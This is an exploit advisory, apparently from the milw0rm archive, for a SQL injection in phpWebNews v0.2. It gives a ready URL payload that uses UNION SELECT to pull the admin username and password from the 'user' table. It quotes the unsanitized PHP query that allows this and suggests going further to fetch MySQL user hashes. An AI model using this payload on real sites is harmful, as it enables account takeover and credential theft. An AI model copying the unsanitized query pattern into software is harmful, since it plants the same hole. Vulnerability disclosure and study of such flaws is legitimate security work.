____ _ _ _ ___ __ _ __
/ ___| ___ | \ | |_ _| | \ \ / /__ _ _ _ __ ___ ___| |/ _| ___ _ __ __ _
| | _ / _ \| \| | | | | | |\ V / _ \| | | | '__/ __|/ _ \ | |_ / _ \| '__/ _` |
| |_| | (_) | |\ | |_| | | | | | (_) | |_| | | \__ \ __/ | _| (_) | | | (_| |
\____|\___/|_| \_|\__,_|_|_| |_|\___/ \__,_|_| |___/\___|_|_|(_)___/|_| \__, |
---------------------------------------------------------------------------|___/
Exploit found by sToRm
phpWebNews v0.2 MySQL Edition (Surat kabar/News Management Online)
SQL Injection
SQL Injection
-------------
index.php?id_kat=null+UNION+ALL+SELECT+1,2,3,4,concat(user,0x3a,passwd),6,7,8,9,10,11,12,13+FROM+user--
$id_kat=$_GET[id_kat];
$m_conn = db_connect();
if ((empty($id_kat))||($id_kat==''))
$m_sql = "select * from berita where status='tampil' and order by tgl desc";
else
$m_sql = "select * from berita where status='tampil' and kode_kategori=$id_kat and isi_berita like %'$m_txt'% order by tgl desc";
Here, we have a classic SQL MySQL injection. The GET variable "id_kat" isn't sanitized before being passed to the query. By injecting our string, the query becomes:
select * from berita where status='tampil' and kode_kategori=null UNION ALL SELECT 1,2,3,4,concat(user,0x3a,passwd),6,7,8,9,10,11,12,13 FROM user-- and isi_berita like %'$m_txt'% order by tgl desc
The comment renders the rest of the query to be useless. We are effectively grabbing the first user from the table "user", which is the admin. You can inject the other strings with server variables and attempt to fetch mysql.user hashes, if the conditions apply.
# milw0rm.com [2008-07-03]
